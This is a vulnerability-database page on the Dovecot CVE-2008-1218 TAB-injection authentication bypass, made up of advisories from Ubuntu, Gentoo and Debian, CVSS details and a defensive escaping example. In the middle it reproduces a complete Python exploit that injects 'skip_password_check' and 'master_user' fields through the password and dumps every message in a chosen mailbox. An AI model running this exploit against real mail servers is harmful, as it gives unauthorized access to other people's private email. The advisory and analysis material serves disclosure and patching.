| CVE-2008-1218 | 
  | 
Published: 2008-03-10 19:44:00 | ||
| Last revised: 2011-03-07 22:06:20 | ||||
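[Original] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
[CNNVD] Dovecot TAB character password-check bypass and unauthorized access vulnerability (CNNVD-200803-106)
        Dovecot is an open-source IMAP and POP3 server for Linux/UNIX-like platforms.
        Dovecot does not sufficiently check and filter user request data, so a remote attacker may exploit this vulnerability to bypass authentication and gain unauthorized access.
        Dovecot's internal protocol uses the TAB character as a delimiter, but the password was sent without being escaped, so a password containing TAB characters can add new internal fields. If a user adds the skip_password_check field in this way at login, the password check can be bypassed and an unauthorized login obtained.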
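The mechanism described above, an unescaped password splitting a TAB-delimited line into extra fields, shown next to an escaped encoding as an added Python example; it is not Dovecot's code. The field names `user` and `pass`, the helper names and the `\x01`-based escape scheme are assumptions for illustration; only `skip_password_check` comes from the advisory text.

```python
# Toy model of a TAB-separated key=value line passed between two processes.
# Assumptions: field names "user"/"pass" and the escape scheme are invented
# for this sketch; only skip_password_check is taken from the advisory.

ESC = "\x01"
_ESCAPES = {ESC: ESC + "1", "\t": ESC + "t", "\n": ESC + "n"}
_UNESCAPES = {"1": ESC, "t": "\t", "n": "\n"}


def escape(value):
    """Replace the delimiter, newline and the escape byte itself."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def unescape(value):
    """Inverse of escape(); rejects truncated or unknown escape sequences."""
    out, chars = [], iter(value)
    for ch in chars:
        if ch != ESC:
            out.append(ch)
            continue
        code = next(chars, None)
        if code not in _UNESCAPES:
            raise ValueError("malformed escape sequence")
        out.append(_UNESCAPES[code])
    return "".join(out)


def encode_unescaped(fields):
    """The flawed sender: values are written to the line as-is."""
    return "\t".join(f"{key}={value}" for key, value in fields.items())


def encode_escaped(fields):
    """The corrected sender: every value is escaped before joining."""
    return "\t".join(f"{key}={escape(value)}" for key, value in fields.items())


def decode(line):
    """Receiver: split on TAB, then on the first '=' of each token."""
    parsed = {}
    for token in line.split("\t"):
        key, _, value = token.partition("=")
        parsed[key] = unescape(value)
    return parsed


def injected_fields(sent, received):
    """Keys the receiver saw that the sender never set (regression check)."""
    return sorted(set(received) - set(sent))


def demo():
    # Constructed sample: a password value that contains a TAB.
    sent = {"user": "alice", "pass": "guess\tskip_password_check=1"}
    flawed = decode(encode_unescaped(sent))
    fixed = decode(encode_escaped(sent))
    return injected_fields(sent, flawed), injected_fields(sent, fixed), fixed == sent


if __name__ == "__main__":
    print(demo())
```

The `injected_fields` check works as a round-trip regression test for any delimiter-based internal protocol: decoding what was encoded must never yield a key the sender did not set.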
        
  –
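  CVSS (Base Score)
 
| CVSS score: | 6.8 | [MEDIUM] | 
| Confidentiality impact: | PARTIAL | [Information disclosure is likely] | 
| Integrity impact: | PARTIAL | [System files may be modified] | 
| Availability impact: | PARTIAL | [May degrade performance or interrupt access to resources] | 
| Attack complexity: | MEDIUM | [Exploitation requires certain access conditions] | 
| Attack vector: | NETWORK | [The attacker does not need intranet or local access] | 
| Authentication: | NONE | [Exploitation requires no authentication] | 
  –
        CWE (Weakness Category)
| CWE-255 | [Credentials Management] | 
  –
       CPE (Affected Platforms and Products)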
| cpe:/a:dovecot:dovecot:1.1:rc2 | |
| cpe:/a:dovecot:dovecot:1.0.12 | 
  –
       OVAL (Technical Details for Detection)
| oval:org.mitre.oval:def:8054 | DSA-1516 dovecot — privilege escalation | 
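| *OVAL describes in detail how to detect this vulnerability; further technical details for detecting it can be found in the related OVAL definition. | |
  –
       Official Database Links
  –
       Other Links and Resources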
  –
  Vulnerability Information
 
| Dovecot TAB character password-check bypass and unauthorized access vulnerability | |
| Medium | Trust management | 
| 2008-03-10 00:00:00 | 2008-10-10 00:00:00 | 
| Remote | |
|
  –
       Advisories and Patches
| 
          The vendor has released upgrade patches that fix this security issue. Patch download links: http://www.debian.org/security/2008/dsa-1516 http://www.dovecot.org/list/dovecot-news/2008-March/000065.html  | 
  –
  Vulnerability Information (5257)
 
| Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit (EDBID:5257) | |
| multiple | remote | 
| 2008-03-14 | Verified | 
| 0 | Kingcope | 
N/A  | 
#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib
print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcope\n"
if len(sys.argv)<3:
     print "usage: %s   [-nossl]" % sys.argv[0]
     exit(0);
if len(sys.argv)>3 and sys.argv[3] == "-nossl":
 M = imaplib.IMAP4(sys.argv[1])
else:
 M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for num in data[0].split():
    typ, data = M.fetch(num, '(RFC822)')
    print 'Message %s\n%s\n' % (num, data[0][1])
    k=k+1
M.close()
M.logout()
print "Messages read: %s" % k
# milw0rm.com [2008-03-14]
    
  –
  Vulnerability Information (F64909)
 
| Ubuntu Security Notice 593-1 (PacketStormID:F64909) | 
2008-03-26 00:00:00  | 
| Ubuntu security.ubuntu.com | 
advisory  | 
linux,ubuntu  | 
CVE-2008-1199,CVE-2008-1218  | 
| 
 Ubuntu Security Notice 593-1 – It was discovered that the default configuration of dovecot could allow access to any email files with group “mail” without verifying that a user had valid rights. An attacker able to create symlinks in their mail directory could exploit this to read or delete another user's email. By default, dovecot passed special characters to the underlying authentication systems. While Ubuntu releases of dovecot are not known to be vulnerable, the authentication routine was proactively improved to avoid potential future problems.  | 
=========================================================== 
Ubuntu Security Notice USN-593-1             March 26, 2008
dovecot vulnerabilities
CVE-2008-1199, CVE-2008-1218
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
Ubuntu 7.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
  dovecot-common                  1.0.beta3-3ubuntu5.6
  dovecot-imapd                   1.0.beta3-3ubuntu5.6
  dovecot-pop3d                   1.0.beta3-3ubuntu5.6
Ubuntu 6.10:
  dovecot-common                  1.0.rc2-1ubuntu2.3
  dovecot-imapd                   1.0.rc2-1ubuntu2.3
  dovecot-pop3d                   1.0.rc2-1ubuntu2.3
Ubuntu 7.04:
  dovecot-common                  1.0.rc17-1ubuntu2.3
  dovecot-imapd                   1.0.rc17-1ubuntu2.3
  dovecot-pop3d                   1.0.rc17-1ubuntu2.3
Ubuntu 7.10:
  dovecot-common                  1:1.0.5-1ubuntu2.2
  dovecot-imapd                   1:1.0.5-1ubuntu2.2
  dovecot-pop3d                   1:1.0.5-1ubuntu2.2
After a standard system upgrade, additional dovecot configuration changes
are needed.
ATTENTION: Due to an unavoidable configuration update, the dovecot
settings in /etc/dovecot/dovecot.conf need to be updated manually.
During the update, a configuration file conflict will be shown.
The default setting "mail_extra_groups = mail" should be changed to
"mail_privileged_group = mail".  If your local configuration uses groups
other than "mail", you may need to use the new "mail_access_groups"
setting as well.
Details follow:
It was discovered that the default configuration of dovecot could allow
access to any email files with group "mail" without verifying that a user
had valid rights.  An attacker able to create symlinks in their mail
directory could exploit this to read or delete another user's email.
(CVE-2008-1199)
By default, dovecot passed special characters to the underlying
authentication systems.  While Ubuntu releases of dovecot are not known
to be vulnerable, the authentication routine was proactively improved
to avoid potential future problems.  (CVE-2008-1218)
    
  –
  Vulnerability Information (F64681)
 
| Gentoo Linux Security Advisory 200803-25 (PacketStormID:F64681) | 
2008-03-19 00:00:00  | 
| Gentoo security.gentoo.org | 
advisory,arbitrary  | 
linux,gentoo  | 
CVE-2008-1199,CVE-2008-1218  | 
| 
 Gentoo Linux Security Advisory GLSA 200803-25 – Dovecot uses the group configured via the mail_extra_groups setting, which should be used to create lockfiles in the /var/mail directory, when accessing arbitrary files (CVE-2008-1199). Dovecot does not escape TAB characters in passwords when saving them, which might allow for argument injection in blocking passdbs such as MySQL, PAM or shadow (CVE-2008-1218). Versions less than 1.0.13-r1 are affected.  | 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  Severity: Normal
     Title: Dovecot: Multiple vulnerabilities
      Date: March 18, 2008
      Bugs: #212336, #213030
        ID: 200803-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Two vulnerabilities in Dovecot allow for information disclosure and
argument injection.
Background
==========
Dovecot is a lightweight, fast and easy to configure IMAP and POP3 mail
server.
Affected packages
=================
    -------------------------------------------------------------------
     Package           /   Vulnerable   /                   Unaffected
    -------------------------------------------------------------------
  1  net-mail/dovecot      < 1.0.13-r1                    >= 1.0.13-r1
Description
===========
Dovecot uses the group configured via the "mail_extra_groups" setting,
which should be used to create lockfiles in the /var/mail directory,
when accessing arbitrary files (CVE-2008-1199). Dovecot does not escape
TAB characters in passwords when saving them, which might allow for
argument injection in blocking passdbs such as MySQL, PAM or shadow
(CVE-2008-1218).
Impact
======
Remote attackers can exploit the first vulnerability to disclose
sensitive data, such as the mail of other users, or modify files or
directories that are writable by group via a symlink attack. Please
note that the "mail_extra_groups" setting is set to the "mail" group by
default when the "mbox" USE flag is enabled.
The second vulnerability can be abused to inject arguments for internal
fields. No exploitation vectors are known for this vulnerability that
affect previously stable versions of Dovecot in Gentoo.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Dovecot users should upgrade to the latest version:
    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-mail/dovecot-1.0.13-r1"
This version removes the "mail_extra_groups" option and introduces a
"mail_privileged_group" setting which is handled safely.
References
==========
  [ 1 ] CVE-2008-1199
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1199
  [ 2 ] CVE-2008-1218
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1218
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
  http://security.gentoo.org/glsa/glsa-200803-25.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[email protected] or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
    
  –
  Vulnerability Information (F64608)
 
| dovecot-disclose.txt (PacketStormID:F64608) | 
2008-03-15 00:00:00  | 
| Kingcope | 
exploit,remote,imap,info disclosure  | 
CVE-2008-1218  | 
| 
 Dovecot IMAP versions 1.0.10 through 1.1rc2 remote email disclosure exploit.  | 
      
  –
  Vulnerability Information (F64601)
 
| Debian Linux Security Advisory 1516-1 (PacketStormID:F64601) | 
2008-03-15 00:00:00  | 
| Debian debian.org | 
advisory  | 
linux,debian  | 
CVE-2008-1199,CVE-2008-1218  | 
| 
 Debian Security Advisory 1516-1 – Prior to this update, the default configuration for Dovecot used by Debian runs the server daemons with group mail privileges. This means that users with write access to their mail directory by other means (for example, through an SSH login) could read mailboxes owned by other users for which they do not have direct write access. In addition, an internal interpretation conflict in password handling has been addressed pro-actively, even though it is not known to be exploitable.  | 
----------------------------------------------------------------------
Debian Security Advisory DSA-1516-1                  [email protected]
http://www.debian.org/security/                           Florian Weimer
March 14, 2008                        http://www.debian.org/security/faq
----------------------------------------------------------------------
Package        : dovecot
Vulnerability  : privilege escalation
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2008-1199 CVE-2008-1218
Debian Bug     : 469457
Prior to this update, the default configuration for Dovecot used by
Debian runs the server daemons with group mail privileges.  This means
that users with write access to their mail directory by other means
(for example, through an SSH login) could read mailboxes owned by
other users for which they do not have direct write access
(CVE-2008-1199).  In addition, an internal interpretation conflict in
password handling has been addressed proactively, even though it is
not known to be exploitable (CVE-2008-1218).
Note that applying this update requires manual action: The
configuration setting "mail_extra_groups = mail" has been replaced
with "mail_privileged_group = mail".  The update will show a
configuration file conflict in /etc/dovecot/dovecot.conf.  It is
recommended that you keep the currently installed configuration file,
and change the affected line.  For your reference, the sample
configuration (without your local changes) will have been written to
/etc/dovecot/dovecot.conf.dpkg-new.
If your current configuration uses mail_extra_groups with a value
different from "mail", you may have to resort to the
mail_access_groups configuration directive.
For the stable distribution (etch), these problems have been fixed in
version 1.0.rc15-2etch4.
For the unstable distribution (sid), these problems have been fixed in
version 1.0.13-1.
For the old stable distribution (sarge), no updates are provided.
We recommend that you consider upgrading to the stable distribution.
Upgrade instructions
--------------------
wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
-------------------------------
These files will probably be moved into the stable distribution on
its next update.
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [email protected]
Package info: `apt-cache show' and http://packages.debian.org/
  –
  Vulnerability Information
 
42979  | 
|
| Dovecot passdbs Argument Injection Authentication Bypass | |
  –
  Vulnerability Description
 
  –
  Timeline
 
2008-03-10  | 
Unknown  | 
| Unknown | Unknown | 
  –
  Solution
 
| Upgrade to version 1.0.13 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. | 
  –
  References
 
  –
  Vulnerability Author
 
| Unknown or Incomplete | 
  –
  Vulnerability Information
 
| Dovecot ‘Tab’ Character Password Check Security Bypass Vulnerability | |
Input Validation Error  | 
28181  | 
| Yes | No | 
| 2008-03-10 12:00:00 | 2008-10-07 05:58:00 | 
The vendor reported this issue.  | 
|
  –
  Affected Versions
 
| Ubuntu Ubuntu Linux 7.10 sparc
Ubuntu Ubuntu Linux 7.10 powerpc
Ubuntu Ubuntu Linux 7.10 i386
Ubuntu Ubuntu Linux 7.10 amd64
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu Linux 7.04 powerpc
Ubuntu Ubuntu Linux 7.04 i386
Ubuntu Ubuntu Linux 7.04 amd64
Ubuntu Ubuntu Linux 6.10 sparc
Ubuntu Ubuntu Linux 6.10 powerpc
Ubuntu Ubuntu Linux 6.10 i386
Ubuntu Ubuntu Linux 6.10 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
S.u.S.E. openSUSE 11.0
S.u.S.E. openSUSE 10.3
S.u.S.E. openSUSE 10.2
rPath rPath Linux 1
Red Hat Fedora 8
Red Hat Fedora 7
Gentoo Linux 2007.0
Gentoo Linux
Dovecot Dovecot 1.0.12
Dovecot Dovecot 1.0.11
Dovecot Dovecot 1.0.11
Dovecot Dovecot 1.0.10
Dovecot Dovecot 1.0.9
Dovecot Dovecot 1.0.8
Dovecot Dovecot 1.0.7
Dovecot Dovecot 1.0.6
Dovecot Dovecot 1.0.5
Dovecot Dovecot 1.0.4
Dovecot Dovecot 1.0.3
Dovecot Dovecot 0.99.14
Dovecot Dovecot 0.99.13
Dovecot Dovecot 0.99.13
Dovecot Dovecot 0.99.10 .6
Dovecot Dovecot 1.1rc2
Dovecot Dovecot 1.0.RC9
Dovecot Dovecot 1.0.RC8
Dovecot Dovecot 1.0.RC7
Dovecot Dovecot 1.0.RC6
Dovecot Dovecot 1.0.RC5
Dovecot Dovecot 1.0.RC4
Dovecot Dovecot 1.0.RC3
Dovecot Dovecot 1.0.RC2
Dovecot Dovecot 1.0.RC15
Dovecot Dovecot 1.0.RC14
Dovecot Dovecot 1.0.RC13
Dovecot Dovecot 1.0.RC12
Dovecot Dovecot 1.0.RC11
Dovecot Dovecot 1.0.RC10
Dovecot Dovecot 1.0.rc1
Dovecot Dovecot 1.0.beta3
Dovecot Dovecot 1.0.Beta2
Dovecot Dovecot 1.0 rc29
Dovecot Dovecot 1.0 beta8
Dovecot Dovecot 1.0 beta7
Dovecot Dovecot 1.0
Debian Linux 4.0 sparc
Debian Linux 4.0 s/390
Debian Linux 4.0 powerpc
Debian Linux 4.0 mipsel
Debian Linux 4.0 mips
Debian Linux 4.0 m68k
Debian Linux 4.0 ia-64
Debian Linux 4.0 ia-32
Debian Linux 4.0 hppa
Debian Linux 4.0 arm
Debian Linux 4.0 amd64
Debian Linux 4.0 alpha
Debian Linux 4.0
Dovecot Dovecot 1.0.13
Dovecot Dovecot 1.1rc3 |
  –
  Unaffected Versions
 
| Dovecot Dovecot 1.0.13       Dovecot Dovecot  1.1rc3  | 
  –
  Discussion
 
| Dovecot is prone to a security-bypass vulnerability because the application fails to adequately sanitize user-supplied input.  An attacker may exploit this issue to gain unauthorized access to the affected application. Successful exploits will compromise the application. Versions prior to Dovecot 1.0.13 and 1.1.rc3 are vulnerable. The vendor states that this issue affects only password databases that have blocking enabled. NOTE: Reports indicate that this issue can be exploited only on versions after Dovecot 1.0.10, which introduced the 'skip_password_check' field.  | 
  –
  Exploit
 
| 
  An attacker can exploit this issue using standard client applications. The following exploit is available:  | 

